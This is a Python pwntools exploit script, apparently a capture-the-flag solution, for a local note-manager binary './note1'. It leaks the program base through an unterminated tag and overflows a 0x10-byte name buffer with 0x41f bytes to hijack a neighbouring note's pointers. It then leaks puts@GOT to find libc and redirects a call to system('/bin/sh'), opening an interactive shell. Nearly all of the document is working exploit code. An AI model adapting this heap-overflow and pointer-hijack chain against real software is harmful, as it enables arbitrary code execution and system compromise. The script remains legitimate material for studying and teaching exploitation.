from pwn import *

# Target binary; its libc is whatever pwntools resolves as the binary's
# loader dependency (ELF.libc), so the two must match the local setup.
BINARY = './note1'
r = process(BINARY)
e = ELF(BINARY)
libc = e.libc
# Debug logging is switched on after the process is spawned, exactly as in
# the original ordering, so the spawn itself is logged at the default level.
context(terminal=['tmux', 'splitw', '-h'], log_level='debug')
# Thin I/O wrappers around the tube `r`; each returns whatever the underlying
# pwntools call returns so they can be used interchangeably with the lambdas
# they replace.


def se(data):
    """Send raw bytes."""
    return r.send(data)


def sa(delim, data):
    """Wait for *delim*, then send raw bytes."""
    return r.sendafter(delim, data)


def sl(data):
    """Send bytes followed by a newline."""
    return r.sendline(data)


def sla(delim, data):
    """Wait for *delim*, then send bytes followed by a newline."""
    return r.sendlineafter(delim, data)


def sea(delim, data):
    """Alias of sa(): wait for *delim*, then send raw bytes."""
    return r.sendafter(delim, data)


def rc(numb=4096):
    """Receive up to *numb* bytes."""
    return r.recv(numb)


def rl():
    """Receive one line."""
    return r.recvline()


def ru(delims):
    """Receive until *delims* is seen."""
    return r.recvuntil(delims)


def uu32(data):
    """Receive until *data* and unpack the last 4 bytes as a little-endian u32."""
    tail = ru(data)[-4:]
    return u32(tail.ljust(4, b'\0'))


def uu64(data):
    """Receive until *data* and unpack the last 6 bytes, zero-padded to 8, as a u64."""
    tail = ru(data)[-6:]
    return u64(tail.ljust(8, b'\0'))


def info_base(tag, base):
    """Log *base* as a hex value under *tag* via the tube's logger."""
    return r.info(tag + ': {:#x}'.format(base))


def leak(name, base):
    """Log a leaked value as a success line."""
    return log.success('{} = {:#x}'.format(name, base))
def dbg(cmd):
    """Attach gdb to the running process with *cmd* as the gdb script, then pause."""
    gdb.attach(r, gdbscript=cmd)
    pause()
def menu(num):
    """Wait for the `> ` prompt and pick menu entry *num*."""
    sla(b'> ', str(num).encode())
def new(index, length, desc, tag):
    """Menu option 1: create note *index*.

    Declares a name of *length* bytes, then sends *desc* and *tag* raw
    (no trailing newline) and selects func 1.
    """
    menu(1)
    sla(b'id:', str(index).encode())
    sla(b'name_length:', str(length).encode())
    sa(b'name: ', desc)
    sa(b'tag', tag)
    sla(b'func:', b'1')
def edit(index, choice, length, desc):
    """Menu option 2: edit note *index* according to *choice*.

    choice 1: re-declare the name as *length* bytes and send *desc* with a newline.
    choice 2: send *desc* raw as the new tag (*length* unused).
    choice 3: select func 1 (*length* and *desc* unused).
    Any other *choice* only selects the sub-menu entry and sends nothing more.
    """
    menu(2)
    sla(b'id: ', str(index).encode())
    sla(b'> ', str(choice).encode())
    if choice == 1:
        sla(b'name_length', str(length).encode())
        sla(b'name: ', desc)
    elif choice == 2:
        sa(b'new tag: ', desc)
    elif choice == 3:
        sla(b'func:', b'1')


def call(index):
    """Menu option 3 ("call") on note *index*."""
    menu(3)
    sla(b'id:', str(index).encode())
# Stage 1: recover the binary's load address.
# Note 0 gets a 0x420-byte name; its tag is then overwritten with exactly
# 8 'a' bytes and no terminator (edit choice 2 sends raw), and choice 3 is
# selected before the note is "called".
new(0,0x420,b'a'*0x420,b'a'*6)
edit(0,2,8,b'a'*8)
edit(0,3,8,b'')
call(0)
# The output printed by call(0) runs past the 8 'a's into whatever bytes
# follow the tag in memory; those are read as one line and unpacked as a
# little-endian qword.  Subtracting 0x131b presumably maps that value back
# to the PIE base — the constant is specific to this ./note1 build.
ru(b'a'*8)
base = u64(rl().strip().ljust(8,b'\x00'))-0x131b
# Stage 2: leak libc.
# Note 0's name is shrunk to 0x10 bytes, then a second note is created so it
# sits after note 0's (now small) name buffer.
edit(0,1,0x10,b'a')
new(1,0x20,b'a'*0x20,b'a'*6)
# pl1 is 0x41f bytes written through edit choice 1 into the 0x10-byte name,
# i.e. far past its declared size.  The 0x31 qword at offset 0x18 looks like
# a heap chunk size field (assumption — verify against the allocator layout);
# the qwords after it replace note 1's stored pointers with base+0x131b and
# the address of puts@GOT so that call(1) prints the GOT entry.
pl1 = b'a'*0x18 + p64(0x31) + b'a'*8 + p64(base+0x131b) + p64(base+e.got['puts']) + p64(0x500)
edit(0,1,0x41f,pl1)
call(1)
# uu64 stops at the first 0x7f byte and unpacks the 6 bytes before it, so
# this assumes a canonical userland pointer ending in 0x7f on the wire.
libc_base = uu64(b'\x7f')-libc.sym['puts']
leak("libc_base",libc_base)
# NOTE: `sys` is an address here, not the sys module; the name is shadowed
# for the rest of the script.
sys = libc_base + libc.sym['system']
# Stage 3: same overflow path as pl1 (0x41f bytes into a 0x10-byte name),
# but note 1's data now carries the string "/bin/sh\0" followed by the
# computed system() address, and call(1) triggers it.
pl2 =b'a'*0x18 + p64(0x31)+ b'/bin/sh\x00' + p64(sys)
edit(0,1,0x41f,pl2)
call(1)
# Hand the tube over to the terminal.
r.interactive()